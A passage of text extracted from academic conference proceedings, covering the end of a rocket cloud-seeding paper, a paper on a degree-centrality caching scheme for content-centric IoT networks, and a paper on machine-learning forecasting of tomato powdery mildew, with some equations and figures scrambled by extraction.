able to get had a payload capacity of 3.94 kg without any external forces like drag,
density, and gravitational pull as the test was done horizontally which shows that
payload would have decreased even more. Apart from this, the availability of raw
materials for the design of the rocket was a huge problem that unexpectedly added
an unnecessary weight of 10 kg to the overall mass of the rocket. Challenges may
occur unexpectedly some are easy to tackle while others are variable and can occur
at any instance. Mechanical challenges: The working, wear and tear of valves, and
other mechanical/hardware parts. Engine failure and leaks over sealing and dealing
with the pressure of the combustion in the engine chamber. Variable challenges:
This includes other challenges that mostly affect the development or initial stage
such as availability of raw materials, design, the computational power of computers,
sensors, budget problems/challenges, developing new techniques for optimization.
All static test problems occurred during the initial stage of the rocket development
which includes all the above challenges.
496 S. Shukla et al.
6 Conclusion
The Novel Umbrella 360 Cloud Seeding Based on Self-Landing Reusable Hybrid
Rocket will be one of the best available solution regarding efficiency, reusability,
cost, and versatility toward the cloud seeding methods as in this report, the testing
phase is being explained with its applications, challenges faced as structural design,
assembly, management of temperature during the testing, thrust, calculations, and the
results. The current phase can be classified as 60% according to as planned and proof
of its scalability. This prototype shows the potential for rocket-based cloud seeding
to be a successful decision so far. Perhaps during its scalability, this approach might
be the best solution for rain making methods that will be decided as things will
get according to plan to make the final and the most efficient rocket-based weather
modification system.
7 Future Scope
References
6. China sets 2020 “artificial weather” target to combat water shortages, East Asia News & Top
Stories—The Straits Times. https://www.straitstimes.com/asia/east-asia/china-sets-2020-artifi
cial-weather-target-to-combat-water-shortages. Last Accessed 15 Jan 2021.
7. Zheng, W., Xue, F., Zhang, M., Wu, Q., Yang, Z., Ma, S., Liang, H., Wang, C., Wang, Y., Ai,
X., Yang, Y., & Yu, K. (2020). Charged particle (negative ion)-based cloud seeding and rain
enhancement trial design and implementation. Water, 12, 1644. https://doi.org/10.3390/w12
061644.
8. Ćurić, M., Lompar, M., Romanic, D., Zou, L., & Liang, H. (2019). Three-dimensional
modelling of precipitation enhancement by cloud seeding in three different climate zones.
Atmosphere, 10, 294. https://doi.org/10.3390/atmos10060294.
9. Quantifying snowfall from orographic cloud seeding | PNAS. https://www.pnas.org/content/
117/10/5190. Last Accessed 15 Jan 2021.
10. Yang, Y., Tan, X., Liu, D., Lu, X., Zhao, C., Lu, J., & Pan, Y. (2018). Corona discharge-induced
rain and snow formation in air. IEEE Transactions on Plasma Science, 46, 1786–1792. https://
doi.org/10.1109/TPS.2018.2820200.
11. Kumar, R. (2018). Scope of cloud seeding in India. IJRASET, 6, 4641–4645. https://doi.org/
10.22214/ijraset.2018.4762.
12. Stroyproject—about us. Manufacturer of LOZA ROCKETS. https://www.cloud-seeding.info/
page.php?id=2&lang=1. Last Accessed 16 Feb 2021.
13. Nashik: Rocket finally fired in dry zone, cloud seeding to bring in rain | Nashik News—Times
of India. https://timesofindia.indiatimes.com/city/nashik/nashik-rocket-finally-fired-in-dry-
zone-cloud-seeding-to-bring-in-rain/articleshow/48510296.cms?utm_source=contentofint
erest&utm_medium=text&utm_campaign=cppst. Last Accessed 16 Feb 2021.
14. Shukla, S., Singh, G., Sarkar, S. K., & Mehta, P. L. (2021). Novel umbrella 360 cloud
seeding based on self-landing reusable hybrid rocket. In International Conference on Inno-
vative Computing and Communications (pp. 999–1011). https://doi.org/10.1007/978-981-15-
5148-2_86..
15. Siliceo, E. P., A, A.A., Mosiño, P. A. (1963). Twelve years of cloud seeding in the Necaxa
Watershed, Mexico. Journal of Applied Meteorology and Climatology, 2, 311–323. https://doi.
org/10.1175/1520-0450(1963)002<0311:TYOCSI>2.0.CO;2.
16. Mnih, V., Kavukcuoglu, K., Silver, D., Rusu, A. A., Veness, J., Bellemare, M. G., Graves, A.,
Riedmiller, M., Fidjeland, A. K., Ostrovski, G., Petersen, S., Beattie, C., Sadik, A., Antonoglou,
I., King, H., Kumaran, D., Wierstra, D., Legg, S., & Hassabis, D. (2015). Human-level control
through deep reinforcement learning. Nature, 518, 529–533. https://doi.org/10.1038/nature
14236.
17. Xian, M., Liu, X., Yin, M., Song, K., Zhao, S., & Gao, T. (2020). Rainfall monitoring based
on machine learning by earth-space link in the ku band. IEEE Journal of Selected Topics in
Applied Earth Observations and Remote Sensing., 13, 3656–3668. https://doi.org/10.1109/JST
ARS.2020.3004375.
18. Molmud, P. (1963). Vernier exhaust perturbations on radar and altimeter systems during a lunar
landing. AIAA Journal, 1(12), 2816–2819. https://doi.org/10.2514/3.2177. https://arc.aiaa.org/
doi/abs/10.2514/3.2177?journalCode=aiaaj.
19. Li, Y., Lu, H., Tian, S., Jiao, Z., & Chen, J. T. (2011). Posture control of electromechanical-
actuator-based thrust vector system for aircraft engine. IEEE Transactions on Industrial Elec-
tronics, 59(9), 3561–3571. https://doi.org/10.1109/TIE.2011.2159351. https://ieeexplore.ieee.
org/abstract/document/5873146.
An Efficient Caching Approach
for Content-Centric-Based Internet
of Things Networks
S. Kumar (B)
Department of Systemics, School of Computer Science, Energy Acres, University of Petroleum
and Energy Studies, Bidholi, Dehradun 248007, India
R. Tiwari
Department of Virtualization, School of Computer Science, Energy Acres, University of
Petroleum and Energy Studies, Bidholi, Dehradun 248007, India
e-mail: rajeev.tiwari@ddn.upes.ac.in
G. Goel
School of Computer Science, CEC, Landran, University of Petroleum and Energy Studies, Energy
Acres, Bidholi, Dehradun 248007, India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 499
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_40
500 S. Kumar et al.
1 Introduction
IoT emerges as the collection of devices, which are connected using the Internet [1,
2].The IoT devices and their applications focus on accessing the required content
with minimal latency instead of focussing on the location of the content source [3].
In this direction, the host-centric properties of current IP-based Internet environment
[4, 5] have a fundamental deviation from the data-centric requirements of the IoT
applications. The tremendous increase in the count of connected IoT nodes and their
data needs has also raised various challenges for the IP-based networks related to
the efficient handling of the content [6].
To mitigate the restrictions from the existing Internet design, a novel CCN archi-
tecture is proposed in recent [7] where each content has a unique name, and the
devices access the contents using their names. The in-network caching capabilities
[8] makes CCN the most suitable architecture for latency-sensitive IoT applications.
For content-centric information retrieval in the IoT networks, CCN implements
three data structures called, forwarding-information-base (FIB), pending-interest-
table (PIT) and the content-store (CS) [9, 10]. To access a content, the IoT device
generates the Interest message and forward it towards the content provider/server
using single-hop/multi-hop communication. After analysing the Interest message, a
content provider creates the content message with required payload and forward it
in the reverse direction towards the requester.
During content message forwarding, the intermediate routers also perform content
caching operations to reduce server load, bandwidth requirements that also increases
QoS for the requesters [11]. Generally, the intermediate routers have extremely small
cache storage as compared to content catalogue size in the network. Hence, efficient
content placement/replacement operations play an important role in the performance
of the CCN. The content caching decisions include content placement (Choosing
appropriate router to cache the content) and content replacement (evicting older
content from the CS of the router, if it becomes full) operations [12, 13]. In order
to effectively utilize the available network resources, an efficient caching scheme is
necessary and required that would increase the QoS for the IoT devices.
In this direction, it is argued that placing the frequently accessed contents for a
longer duration, on those routers that have a higher degree-centrality and are near
to edges of the network, would improve the network performance. Therefore, the
proposed scheme jointly considers the router’s degree, its distance traversed by the
Interest message from content provider and content popularity for caching decisions
during content forwarding.
2 Literature Review
Presently, the connected world of IoT devices turned out to be a reality that includes
several application domains such as smart wearables, smart cities, health care and
An Efficient Caching Approach … 501
energy management systems [14]. To improve the data dissemination in the IoT
environment, CCN implements in-network caching to minimize the network delay
and bandwidth requirements. The effectiveness of the content caching mechanism
ensures improvement in the QoS offered to the IoT devices (requesters) as the cache
sizes of the network routers are very low to store huge data transmissions. There-
fore, various caching strategies have been suggested by the researchers that place
the contents in the network routers to reduce the server load and deliver requested
contents with reduced latency.
The leave-copy-everywhere (LCE) [7] caching scheme is the traditional strategy
for the CCN that copies the content in every intermediate router. The random
probability-based placement scheme (Prob) [15] considers the random probability to
cache the contents. The scheme provides a simple mechanism for the caching oper-
ations, which is independent of the network and content characteristics. The Prob-
cache [16] scheme determines the route caching capability during the data placement
decisions and equitably multiplex the contents of diverged routes.
A centrality metric centred caching strategy is recommended in [17], which selec-
tively places the content replicas in the network by considering the betweeness
centrality of the on-path routers. The CPNDD scheme [18] jointly considers the
node degree centrality and hop-count characteristics to determine suitable router
for content placement operations. The caching strategy discussed in [19] uses the
combination of several centrality metrics and popularity of contents for caching
decisions.
The MAX-gain in-network caching (MAGIC) [20] scheme performs content
caching operations using the content access pattern and the distance parameters. The
fine-grained popularity-based caching (FGPC) scheme [21] determines the content
access frequency using a distinguished data structure and uses a static value to deter-
mine the frequently accessed contents. The DPWCS [22] implements a novel data
structure in all network routers to filter popular contents and perform caching oper-
ations in those intermediate routers that experience higher access frequency for that
content.
Table 1 Simulation
Parameter Value
parameters
CS(Ri ) 50
ψ 0.1–1.0
λ 50/s
Payload size 1 KB
Content catalogue size (|N|) 5000
Exponent value in Zipf 0.8
distribution (α)
Network topology Abilene [23]
Simulation duration 1050 STU (Simulation Time
Unit)
C DC(Ri ) Hop C j
Gain Rij = × (1)
Max(DC(Ri )) Hop I j
5 CS(Ri ) is already full, then the older content would be removed from cache space
using least frequently used (LFU) cache replacement strategy. Then, Ri forwards
the content towards requesters after caching decision using Eq. 2.
C
True, if Gain Rij ≥ ψ
Cache Content Ri , C j = C (2)
False, if Gain Rij < ψ
For the optimal value of ψ, the performance of the proposed caching scheme
has been explored for different values of ψ in the ndnSIM simulation with param-
eters mentioned in Table 1. During executions, the optimal network performance
is obtained with ψ = 0.2, and therefore, this value is used during the simulations.
Although the configuration of the threshold parameter is relatively arbitrary for the
simulations and may change for other network topologies, it provides a good starting
point to explore the caching performance in the CCN-based IoT environment.
4 Performance Evaluation
The QoS delivered by proposed caching scheme is examined with several competing
peer strategies mentioned in the literature review section, which are DC-based
caching, LCE, Random-Prob(0.3) and FGPC caching mechanisms. The default cache
replacement strategy used with the peer schemes is least recently used (LRU). The
performance of the caching schemes has been compared on three parameters; cache
hit ratio, network hop-count and the latency (delay) in retrieving the requested
content.
504 S. Kumar et al.
(a) Cache hit-ratio with CS Ri =50 (b) Cache hit-ratio with CS Ri =100
Fig. 1 Cache hit ratio with α = 0.8, λ = 50/second and (|N|) = 5000
The average hit ratio is determined by considering the fraction of the total number
of cache-hitting operations and the requests encountered by the routers in per unit
time. Figure 1a shows the average network hit ratio when cache size of in-network
routers has been set to 50 contents. Initially, the caching schemes experienced lower
average hit ratio because network cache are empty in the beginning. With time, the
performance of the content placement strategies has been increased as routers begin
placements of forwarded contents as per the caching policies. During simulations, the
proposed scheme shows 4.3, 5.1, 4.8% and 5.0% improvement in the average cache
hit ratio from the DC-based, LCE, Prob(0.3) and FGPC caching strategies. When
cache size of the network routers is improved and assumed to be 100 contents per
router during simulation, the improvement in the hit ratio for each caching mechanism
is observed as shown in Fig. 1b. The results illustrate that the proposed mechanism
outperforms the peer schemes by demonstrating up-to 6.1% gain in the average hit
ratio.
The value of the hop-count metric for an Interest is determined by the summa-
tion of the number of hops traversed by the Interest message to reach the content
provider and by the corresponding content message during its delivery. Figure 2a
illustrates average network hop-count observed in the caching mechanisms after
assuming that the caching capacity of network routers is 50. In this scenario, proposed
scheme observes 13.1, 15.4, 14.5 and 14.2% drop in the average hop-count from the
DC-based, LCE, Prob(0.3) and the FGPC schemes. When caching capacity of the
intermediate routers increases to 100 contents, the proposed solution achieves up-to
16.6% drop in the average network hop-count from the peer competing schemes.
The value of average network delay is the time period from creation of Interest
message and the transportation of that content to requester. When caching capacity
of routers has been assumed to 50, the proposed strategy drops the average delay
up-to 14.5% from the existing schemes as shown in Fig. 3a. The analogous perfor-
mance gains are obtained by the proposed scheme when cache space of the routers
is increased to 100 where the proposed strategy decreases the average network delay
between 11 and 12.5% from the existing peer schemes as shown in Fig. 3b.
An Efficient Caching Approach … 505
(a) Average hop-count with CS Ri =50 (b) Average hop-count with CS Ri =100
Fig. 2 Average network hop-count with α = 0.8, λ = 50/second and (|N|) = 5000
(a) Average delay with Csize=50 (b) Average delay with Csize=100
Fig. 3 Average network delay (in micro-seconds) with α = 0.8, λ = 50/second and (|N|) = 5000
5 Conclusion
In this paper, a novel caching scheme has been proposed which is suitable for
the CCN-based IoT environment. The scheme jointly considers the node degree
centrality, hop-count metrics and LFU strategy for the content caching decisions.
The performance of the proposed caching scheme is compared with various state-
of-the-art schemes such as LCE, DC-based, Prob (0.3) and the FGPC. When the
ratio of CS(Ri ) and |N| is 1%, the proposed strategy achieves up-to 5.1% increase in
the average cache hit ratio and drop-off network hop-count and the delay up-to 15.4
and 14.5% from the peer caching schemes, respectively. Analogous performance
improvement is experienced when the cache space of the network routers is enlarged
to 100 contents (2% of |N|), and the proposed scheme shows significant performance
improvement from the competing strategies. Hence, the proposed scheme is suitable
for large-scale CCN-based IoT networks and their applications. In future, more char-
acteristics of the content and networks will be explored to improve the QoS under
dynamic network topologies.
506 S. Kumar et al.
References
1. Khan, E., Garg, D., Tiwari, R., & Upadhyay, S. (2018). Automated toll tax collection system
using cloud database. In 2018 3rd International Conference On Internet of Things: Smart
Innovation and Usages (IoT-SIU) (pp 1–5). IEEE.
2. Djama, A., Djamaa, B., & Senouci, M. R. (2020). Information-centric networking solutions
for the internet of things: a systematic mapping review. Computer Communications.
3. Din, I. U., Asmat, H., & Guizani, M. (2019). A review of information centric network based
internet of things: Communication architectures, design issues, and research opportunities.
Multimedia Tools and Applications, 78(21), 30241–30256.
4. Tiwari, R., & Kumar, N. (2016). An adaptive cache invalidation technique for wireless
environments. Telecommunication Systems, 62(1), 149–165.
5. Tiwari, R., & Kumar, N. (2015). Minimizing query delay using co-operation in ivanet. Procedia
Computer Science, 57, 84–90.
6. Arshad, S., Azam, M. A., Rehmani, M. H., & Loo, J. (2018). Recent advances in information-
centric networking-based internet of things (icn-iot). IEEE Internet of Things Journal, 6(2),
2128–2158.
7. Jacobson, V., Smetters, D. K., Thornton, J. D., Plass, M. F., Briggs, N. H., & Braynard, R.
L. (2009). Networking named content. In Proceedings of the 5th International Conference on
Emerging Networking Experiments and Technologies. Association for Computing Machinery,
New York, NY, USA, CoNEXT ’09 (pp. 1–12). https://doi.org/10.1145/1658939.1658941
8. Hail, M. A., Amadeo, M., Molinaro, A., & Fischer, S. (2015). Caching in named data networking
for the wireless internet of things. In 2015 International Conference on Recent Advances in
Internet of Things (RIoT ) (pp. 1–6). IEEE.
9. Jacobson, V., Mosko, M., Smetters, D., & Garcia-Luna-Aceves, J. (2007). Contentcentric
networking, whitepaper describing future assurable global networks (pp. 1–9). Palo Alto
Research Center, Inc.
10. Kumar, S., Tiwari, R., Obaidat, M.S., Kumar, N., Hsiao, K. F. (2020). Cpndd: Content placement
approach in content centric networking. In ICC 2020–2020. IEEE International Conference
on Communications (ICC) (pp. 1–6). IEEE.
11. Abdullahi, I., Arif, S., & Hassan, S. (2015). Survey on caching approaches in information
centric networking. Journal of Network and Computer Applications, 56, 48–59.
12. Tiwari R, Kumar N (2012) A novel hybrid approach for web caching. In 2012 Sixth International
Conference on Innovative Mobile and Internet Services in Ubiquitous Computing (pp. 512–
517). IEEE.
13. Tiwari, R., Sharma, H. K., Upadhyay, S., Sachan, S., & Sharma, A. (2019). Automated parking
system-cloud and iot based technique. International Journal of Engineering and Advanced
Technology (IJEAT), 8(4C), 116–123.
14. Naeem, M. A., Ali, R., Kim, B. S., Nor, S. A., & Hassan, S. (2018). A periodic caching strategy
solution for the smart city in information-centric internet of things. Sustainability, 10(7), 2576.
15. Arianfar, S., Nikander, P., Ott, J. (2010). On content-centric router design and implications.
In Proceedings of the Re-Architecting the Internet Workshop, Association for Computing
Machinery, New York, NY, USA, ReARCH ’10 (pp. 1–6). https://doi.org/10.1145/1921233.
1921240
16. Psaras, I., Chai, W. K., Pavlou, G. (2012). Probabilistic in-network caching for information-
centric networks. In Proceedings of the Second Edition of the ICN Workshop on Information-
Centric Networking (pp. 55–60).
17. Chai, W. K., He, D., Psaras, I., & Pavlou, G. (2013). Cache “less for more” in information-centric
networks (extended version). Computer Communications, 36(7), 758–770.
18. Kumar, S., Tiwari, R. (2020). An efficient content placement scheme based on normalized node
degree in content centric networking. Cluster Computing, 1–15.
19. Gao, Y., Zhou, J. (2019). Probabilistic caching mechanism based on software defined content
centric network. In 2019 IEEE 11th International Conference on Communication Software and
Networks (ICCSN) (pp. 210–214). IEEE.
An Efficient Caching Approach … 507
20. Ren, J., Qi, W., Westphal, C., Wang, J., Lu, K., Liu, S., & Wang, S. (2014). MAGIC: a distributed
MAx-gain in-network caching strategy in information centric networks. In 2014 IEEE Confer-
ence on Computer Communications Workshops (INFOCOM WKSHPS) (pp. 470–475). IEEE.
https://doi.org/10.1109/infcomw.2014.6849277
21. Ong, M. D., Chen, M., Taleb, T., Wang, X., & Leung, V. C. (2014). FGPC: fine-grained
popularity-based caching design for content centric networking. In Proceedings of the 17th
ACM International Conference on Modeling Analysis and Simulation of Wireless and Mobile
Systems—MSWiM ’14 (pp. 295–302). ACM Press. https://doi.org/10.1145/2641798.2641837
22. Kumar, S., & Tiwari, R. (2020). Optimized content centric networking for future internet:
dynamic popularity window based caching scheme. Computer Networks, 179, 107434.https://
doi.org/10.1016/j.comnet.2020.107434
23. Alderson, D., Li, L., Willinger, W., & Doyle, J. C. (2005). Understanding internet topology:
Principles models and validation. IEEE/ACM Transactions on Networking, 13(6), 1205–1218.
A Forecasting Technique for Powdery
Mildew Disease Prediction in Tomato
Plants
Anshul Bhatia, Anuradha Chug, Amit Prakash Singh, Ravinder Pal Singh,
and Dinesh Singh
Abstract In the current scenario, plant disease detection is seeking attention from
many agricultural scientists. Plant diseases are deeply influenced by the weather
conditions, and each disease has its individual weather requirements. The changes
in weather parameters such as humidity, temperature, wind speed, etc., can cause
many diseases in tomato plants. In the current empirical study, we have taken specific
disease powdery mildew whose fungus is named as Leveillula Taurica which belongs
to Leotiomycetes class, and it is responsible for the occurrence of this specific disease
in tomatoes. In this research, three weather-based prediction models have been devel-
oped using k-nearest neighbor (kNN), decision tree (DT), and random forest (RF)
algorithm for powdery mildew disease prediction in tomatoes at an early stage.
Results indicate that the proposed model, based on RF algorithm, shows the best
accuracy of 93.24% for tomato powdery mildew disease (TPMD) dataset. A real-
time version of the proposed model can be used by the agricultural experts to take
preventive measures in the most sensitive areas that are prone to powdery mildew
disease based on the weather conditions. Hence, timely intervention would help in
reducing the loss in productivity of tomato crops which will further benefit the global
economy, agricultural production, and the food industry.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 509
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_41
510 A. Bhatia et al.
1 Introduction
Tomato is one of the most consumable species of fruit whose yield and quality are
highly affected due to the rapidly changing weather conditions as well as global
warming. This crop suffers from various severe diseases, namely early blight, bacte-
rial leaf spot, leaf mold, powdery mildew, fusarium wilt, gray mold, late blight, and
many more. Powdery mildew is the most common fungal disease found in tomato
plants which is caused by a harmful pathogen named as Leveillula Taurica [1].
Changes in the climatic conditions can aggravate the risk of disease development in
the agricultural sector. A standardized range of weather conditions of a particular
area plays a crucial role in the productivity of any crop. However, any deviation
from the normal weather conditions may cause the risk of disease development in
the plant which can degrade its quality and productivity. Weather parameters such
as wind speed, global radiation, humidity, temperature, and leaf wetness are the
most critical factors, which are liable for the growth of powdery mildew disease in
tomato crop [2, 3]. Agricultural scientists have proposed a more prevalent approach,
i.e., image-based forecasting models for the prediction of tomato powdery mildew
disease [4–8] in the last decade, however, very few of them have worked on the
weather-based disease forecasting models [2, 9–12].
Many scientists have worked on tomato powdery mildew disease forecasting till
date, and few important studies are discussed here. Guzman-Plazola [9] proposed
a spray forecasting model for early prediction and prevention of powdery mildew
disease in tomato plants using a well-known machine learning approach, i.e., linear
discriminant analysis (LDA). He tested this model for two years between 1995 and
1996 on tomato fields of northern San Joaquin and southern Sacramento Valleys of
California. This model was capable of generating risk warnings and spray recom-
mendations based on the favorable weather conditions for the development of this
disease. In the year 2010, Ghaffari et al. [13] used various techniques based on artifi-
cial neural network (ANN) for the early detection of the same disease carried out in
current research. In one of the studies, Rumpf et al. [14] have applied the concept of
hyperspectral reflectance in conjunction with support vector machine (SVM) clas-
sifier for timely detection of powdery mildew. Further, Prince et al.[15] have also
contributed to this research by developing an image-based disease prediction model
by using SVM classifier. In the year 2015, Mokhtar et al. [16] also successfully
applied an SVM-based machine learning approach with Gabor wavelet transform
for disease detection. In one of the researches, Fuentes et al. [4] have also developed
disease prediction models by using various deep learning techniques and found that
the proposed models were efficient enough to identify the nine different types of pests
and tomato plant diseases including the complex scenarios of plants’ surrounding
areas. Authors have also built a mobile application using deep learning techniques
for many tomato plant disease’s predictions, and powdery mildew was also one of
them [5] which was using image as an input; whereas in the current research, we have
also tried to find out the best possible machine learning technique in order to develop
a forecasting model for powdery mildew disease detection in tomato plants using
A Forecasting Technique for Powdery Mildew Disease … 511
sensors data. Three machine learning techniques viz. k-nearest neighbor (kNN) [17],
decision tree (DT) [18], and random forest (RF) [19] are used to build the disease
prediction model. The performance of all the three models has been compared using
the most prominent accuracy metric which in turn helped to choose the best predic-
tion model. Results of this study can help the farmers as well as agricultural scientists
for early detection of this disease, and further, timely preventive measures can be
adopted in order to increase the quality of the crop.
The remaining paper is organized in the following manner: Sect. 2 highlights the
prior studies followed by research methodology in Sect. 3. Experimental results are
discussed in Sect. 4. Lastly, Sect. 5 summarizes the whole study with its future scope.
2 Literature Review
In literature, many researchers have proposed disease prediction models for various
plants. A few of them have been discussed in this section. In 2016, Saborl and
Kumar used the concept of DT to detect various tomato plant diseases. Their model
has achieved an accuracy of 76% [20]. Further, in 2018, Verma et al. published a
review paper on various disease prediction models based on machine learning and
image processing techniques [5]. In the next year, they developed a deep learning-
based android application for tomato disease prediction [8]. In 2020, Verma et al.
have also used the concept of capsule networks for potato disease diagnosis. Their
model was 91.83% accurate [7]. Further, in 2020, Bhatia et al. have used the concept
of extreme learning machine (ELM) algorithm with various resampling techniques to
detect powdery mildew disease in tomato plants [12]. They have achieved the predic-
tion accuracy of 89.91% in their study. In the same year, they have also proposed a
hybridized model for tomato powdery mildew disease prediction. There model was
92.37% accurate [10]. Again in 2020, Bhatia et al. also proposed a feature selection-
based approach for soybean disease diagnosis. Their technique has achieved an accu-
racy of 98.10% [11]. In the current study, we have also tried to develop a robust and
efficient technique for powdery mildew disease prediction in tomato plants.
3 Research Methodology
This section explains the overall methodology being followed in this paper with a
diagrammatic representation as shown in Fig. 1. Initially, tomato powdery mildew
disease (TPMD) dataset has been divided into 70% training and 30% testing data.
Further, three prediction models have been developed for TPMD dataset using kNN,
DT, and RF techniques. Lastly, on the basis of the performance measure metric, i.e.,
accuracy, the best model has been identified among the three prediction models
deployed in the current study. The proposed method has been implemented in
“RStudio Version 1.1.463.” The datasets have been elaborated in Sect. 3.1. Further,
512 A. Bhatia et al.
TPMD Dataset
an overview of kNN, DT, and RF algorithms has been provided in Sects. 3.2, 3.3
and 3.4, respectively. Lastly, Sect. 3.5 describes the performance metric used in this
study, i.e., the accuracy.
3.1 Dataset
A sensor-based time-series dataset, i.e., TPMD has been used in this study [2]. The
TPMD dataset provides information about the conduciveness of a particular day in
terms of tomato powdery mildew disease development based on various meteorolog-
ical parameters. These parameters include wind speed (WS), temperature (T), global
radiations (GR), relative humidity (RH), and leaf wetness (LW). The TPMD dataset
comprises of 244 observations, in which the above-mentioned meteorological param-
eters are considered as predictive (independent) variables and conduciveness/non-
conduciveness of a day is taken as response (dependent) variable. The dataset can
be access through the following link: https://bit.ly/2QQpNvW.
kNN is a widely used supervised machine learning algorithm which uses the concept
of “close proximity (similar things are near to you)” to predict the class label of new
data point [17]. Let us assume that X is a training dataset which contains n number of
data points (X 1 ,X 2 …, Xn) and m number of attributes (a1 , a2 …, am ). Further, k is the
assumed integer value which indicates the number of nearest data points, and Y i is
A Forecasting Technique for Powdery Mildew Disease … 513
a test data point with equal number of attributes as training dataset. So, the working
of kNN can be understood with the help of following steps:
Step 1: Calculate the distance between the test data point, Y i and each row of the
train dataset X with the help of one of the distance functions, namely Manhattan or
Euclidean. Both of these function depends on Minkowski distance Formula which
calculates distance (D) between two variables U and V as shown in Eq. (1). In Eq. (1),
if p = 1, then it represents Manhattan distance, and if p = 2, then it shows Euclidean
distance.
1/ p
n
D= |Ui − Vi | p
(1)
i=1
Step 2: Afterward, on the basis of the distance from test data point Y i , sort each
training sample (data point) in ascending order and store it in an array.
Step 3: Next, kNN algorithm will choose top k data points from the sorted array.
Step 4: Lastly, a class label will be assigned to the test data point on the basis of
the most frequent class of these k data points or the nearest neighbors.
The above algorithm can be explained with the help of an example. Suppose, in
Fig. 2, “circle” symbol represents the data samples belonging to the conducive class,
whereas the “star” symbol shows the data samples belonging to the non-conducive
class. Further, Q1 is the new sample to be classified and k = 3. Hence, kNN algorithm
will find three nearest neighbors of the respective new sample Q1 . It can be seen from
Fig. 2 that out of the three nearest neighbors, two belongs to the non-conducive class
that is why sample Q1 will be assigned to the non-conducive class.
: Conducive Class
Y-Axis (Relative Humidity)
: Non-Conducive Class
X-Axis (Temperature)
metric, which is equal to the ratio between the number of accurate predictions made
by the classification model and the total number of predictions as shown in Eq. (2).
It can be calculated using a two-dimensional table known as the confusion matrix.
Figure 4 shows a sample confusion matrix.
There are some basic terms associated with any confusion matrix which are as
follows:
• The number of correctly identified instances that do not belong to the class (True
Negative (TN))
• The number of correctly identified instances that belong to the class (True Positive
(TP))
• The number of instances that were either incorrectly assigned to the class (False
Positive (FP)) or not identified as a class instance (False Negative (FN)
This section discusses the results of the experiment performed on the TPMD dataset.
Initially, the dataset was divided into 70–30 Train-Test ratio. After this, the Train-Set
was used for developing the prediction models for tomato powdery mildew disease
forecasting based on DT, kNN, and RF algorithms. Further, all the three trained
models were tested using Test-Set. Finally, a comparison of these models was made
with the help of the “Accuracy” metric for selecting a most suitable algorithm in
the present work. Figure 5 shows the confusion matrices for DT, kNN, and RF
algorithms. Based on these confusion matrices, the accuracy of DT, kNN, and RF
prediction model was calculated by putting the following values of TP, TN, FP, and
FN in Eq. (2):
Authors have observed that all the three algorithms, i.e., kNN, DT and RF
performed well with TPMD dataset because it can be seen that the accuracy lies
within the range of 89.19% to 93.24%, and it is considered as fairly well. Results
also indicate that the forecasting system based on RF performed the best among all
the three models with an accuracy of 93.24%, whereas DT-based model performed
the worst with 89.19% accuracy as shown in Fig. 6. Hence, it is fair to presume
that the proposed model can be efficiently used in the farming industry for early
prediction of powdery mildew disease detection in tomato plants.
The TPMD dataset was collected by Bakeer et al. in 2013 [2] to validate a disease
prediction model introduced by Guzman-Plazola in 1997 [9]. Further, in 2020, this
dataset was used by Bhatia et al. [12] for detection of powdery mildew disease
using extreme learning machine (ELM) algorithm. They have used four resampling
A Forecasting Technique for Powdery Mildew Disease … 517
(a) Confusion Matrix for DT algorithm (b) Confusion Matrix for kNN algorithm
Actual Actual
Conducive Non-Conducive Conducive Non-Conducive
Conducive
Conducive
10 8 12 6
Predicted
Predicted
Non-Conducive
Non-Conducive
0 56 0 56
13 5
Predicted
Non-Conducive
0 56
Performance Comparison
94.00%
93.00%
92.00%
Accuracy
91.00%
90.00%
89.00%
88.00%
87.00%
DT kNN RF
Accuracy 89.19% 91.89% 93.24%
In the current study, authors have used three machine learning approaches, namely
kNN, DT, and RF to develop different disease prediction models, and it was found
that RF technique performed the best on TPMD dataset with 93.24% accuracy. Using
TPDM dataset, the proposed kNN, DT, and RF-based prediction models could predict
whether the meteorological conditions on a particular day are conducive for the
development of disease or not. If the model classifies a particular day as conducive,
then a warning may be sent to the farmer indicating the need to spray the fungicide
at that point of time. This way, the recommendations of the proposed models in
the current study can be used to reduce the unnecessary fungicide spray with no
significant impact on the yield and quality of the fruit. In future, we are planning
to develop a mobile-based application for the early detection of the tomato diseases
on the basis of weather conditions. Once the disease is diagnosed by the model,
this application will suggest the possible solutions through some communication
medium, which will in turn help the farmers to protect the tomato crop by timely
application of control measures. An online plant disease anticipator can also be made
which will give all the details about conducive weather conditions for a specific
A Forecasting Technique for Powdery Mildew Disease … 519
disease and also provide possible treatment as per the severity level of that particular
disease.
Acknowledgements This work is financially supported by the Department of Science and Tech-
nology (DST) under a project with reference number “DST/Reference.No.T-319/2018-19.” We are
grateful to them for their immense support.
References
1. Jones, W. B., & Thomson, S. V. (1987). Source of inoculum, yield, and quality of tomato as
affected by Leveillula taurica. Plant disease, 71(3), 266–268.
2. Bakeer, A. R. T., Abdel-Latef, M. A. E., Afifi, M. A., & Barakat, M. E. (2013). Validation of
tomato powdery mildew forecasting model using meteorological data in Egypt. International
Journal of Agriculture Sciences, 5(2), 372.
3. Verma, S., Bhatia, A., Chug, A., & Singh, A. P. (2020). Recent advancements in multimedia
big data computing for IoT applications in precision agriculture: opportunities, issues, and
challenges. In Multimedia big data computing for IoT applications (pp. 391–416). Springer,
Singapore.
4. Fuentes, A., Yoon, S., Kim, S. C., & Park, D. S. (2017). A robust deep-learning-based detector
for real-time tomato plant diseases and pests recognition. Sensors, 17(9), 2022.
5. Verma, S., Chug, A., & Singh, A. P (2018). Prediction models for identification and diag-
nosis of tomato plant diseases. In 2018 International Conference on Advances in Computing,
Communications and Informatics (ICACCI) (pp. 1557—1563).
6. Verma, S., Chug, A., & Singh, A. P. (2020). Application of convolutional neural networks for
evaluation of disease severity in tomato plant. Journal of Discrete Mathematical Sciences and
Cryptography, 23(1), 273–282.
7. Verma, S., Chug, A., & Singh, A. P. (2020). Exploring capsule networks for disease
classification in plants. Journal of Statistics and Management Systems, 23(2), 307–315.
8. Verma, S., Chug, A., Singh, A. P., Sharma, S., & Rajvanshi, P. (2019). Deep learning-based
mobile application for plant disease diagnosis: a proof of concept with a case study on tomato
